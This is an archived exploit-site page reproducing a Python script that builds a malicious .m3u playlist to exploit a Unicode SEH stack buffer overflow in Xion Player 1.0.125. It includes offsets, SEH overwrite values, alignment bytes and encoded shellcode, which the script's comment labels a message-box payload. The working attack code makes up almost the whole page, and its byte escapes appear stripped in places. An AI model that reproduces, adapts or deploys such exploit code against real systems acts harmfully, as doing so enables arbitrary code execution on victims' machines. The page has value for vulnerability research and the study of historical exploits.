Home / os / win7

Xion Player 1.0.125 Stack Buffer Overflow Exploit

Posted on 13 August 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Xion Player 1.0.125 Stack Buffer Overflow Exploit</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>=================================================
Xion Player 1.0.125 Stack Buffer Overflow Exploit
=================================================

#!/usr/bin/python
# #######################################################################
# Title:                Xion 1.0.125 Stack Buffer Overflow
# Date:                 August 13, 2010
# Author:               corelanc0d3r and dijital1
#                       Grtz to dijital1 : I had a lot of fun working with
#                       you on this one ! :)
#                       Grtz to dookie2000ca :)
# Original Advisory:    http://www.exploit-db.com/exploits/14517 (hadji samir)
# Download:             http://www.exploit-db.com/application/14517
# Platform:             Windows XP SP3 En Professional - VirtualBox
# Greetz to:            Corelan Security Team
# http://www.corelan.be:8800/index.php/security/corelan-team-members/
# #######################################################################
# Script provided 'as is', without any warranty.
# Use for educational purposes only.
# Do not use this code to do anything illegal !
# Corelan does not want anyone to use this script
# for malicious and/or illegal purposes
# Corelan cannot be held responsible for any illegal use.
#
# Note : you are not allowed to edit/modify this code. 
# If you do, Corelan cannot be held responsible for any damages this may cause.
#
 
print &quot;|------------------------------------------------------------------|&quot;
print &quot;|                         __               __                      |&quot;
print &quot;|   _________  ________  / /___ _____     / /____  ____ _____ ___  |&quot;
print &quot;|  / ___/ __ / ___/ _ / / __ `/ __    / __/ _ / __ `/ __ `__  |&quot;
print &quot;| / /__/ /_/ / /  /  __/ / /_/ / / / /  / /_/  __/ /_/ / / / / / / |&quot;
print &quot;| \___/\____/_/   \___/_/\__,_/_/ /_/   \__/\___/\__,_/_/ /_/ /_/  |&quot;
print &quot;|                                                                  |&quot;
print &quot;|                                       http://www.corelan.be:8800 |&quot;
print &quot;|                                              security@corelan.be |&quot;
print &quot;|                                                                  |&quot;
print &quot;|-------------------------------------------------[ EIP Hunters ]--|&quot;
print &quot;   -= Exploit for Xion 1.0.125 - Unicode (SEH) - corelanc0d3r =-&quot;
print &quot;&quot;
print &quot; [+] Preparing payload...&quot;
outputfile=&quot;corelanc0d3r.m3u&quot;
offset_to_nseh=250   #affected by the m3u path length !
junk = &quot;A&quot; * offset_to_nseh
nseh=&quot;x41x45&quot;
seh=&quot;x93x47&quot; #Unicode conversion : 0x0047201C =&gt; mov eax,esi + ppr
junk2=&quot;x45&quot; 
align=&quot;x55&quot;  #push ebp
align=align+&quot;x6d&quot;  #pad (ebp is writable)
align=align+&quot;x58&quot;  #pop eax
align=align+&quot;x6d&quot;
align=align+&quot;x05x25x11&quot;
align=align+&quot;x6d&quot;
align=align+&quot;x2dx11x11&quot;
align=align+&quot;x6d&quot;
align=align+&quot;x50x6dxc3&quot;  #go!
align=align+&quot;I&quot;*56
#msgbox
shellcode=&quot;PPYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAIAQAIAQAIAhAAAZ1AI&quot;
shellcode+=&quot;AIAJ11AIAIABABABQI1AIQIAIQI111AIAJQYAZBABABABABkMAGB9u4JBhYzKskhY4&quot;
shellcode+=&quot;4nDJTLq6rfRajNQuyOtTKQaP0TKt6LLTKQfkl2koVJh4K3NO02kOFOHpOKhrUJS29Z&quot;
shellcode+=&quot;axQyo8as0DK0lNDKtDKOUMlBkntKUqhKQxjBkmzJxdKQJKpkQzKgsP7MyDKltDKjaJ&quot;
shellcode+=&quot;NLqkO017PKLVL2dGPQdKZWQ6olMkQI7xizQ9oyoKOOKSLktmX45GnDKQJktjaHkpfD&quot;
shellcode+=&quot;KlL0KrkNzMLiqZKBkyt4KM1iX2iMtKtkloqVcVRlHNIhT3YHe1ywRoxdNNnZnJLr2W&quot;
shellcode+=&quot;x5LKOIoKOqymuitEkSNvxgrd357KlktobYXDKIokOKOu9oUyx0hplplo0yoQXNSoBL&quot;
shellcode+=&quot;nC4QXPupsS52R58aLMTlJqyJFR6KOaEKTqyWRB07KUXW2NmwLDGMLktpRWxQNKOkOi&quot;
shellcode+=&quot;orHnxKpo0Kpph1DS5s1BMphplc1PnmPoxpCrOprpeNQIKDHOlktZl4IK3aXrRNxMPO&quot;
shellcode+=&quot;0oxbCNPOtMcQXREplOqpn38mPOsPobRQXbDKps2RY0hNoD7pn35May9sXPLO4ju2iY&quot;
shellcode+=&quot;QNQyBobOcnqQB9o8PNQY00PIoPUyxKZA&quot;
 
junk3=&quot;x49&quot;*2550
 
payload=junk+nseh+seh+junk2+align+shellcode+junk3
print &quot; [+] Writing payload to file &quot;+outputfile+&quot; (&quot; + str(len(payload))+&quot; bytes)&quot;
FILE = open(outputfile, &quot;w&quot;)
FILE.write(payload)
FILE.close()
print &quot; [+] Done&quot;


# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-08-13]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 

TOP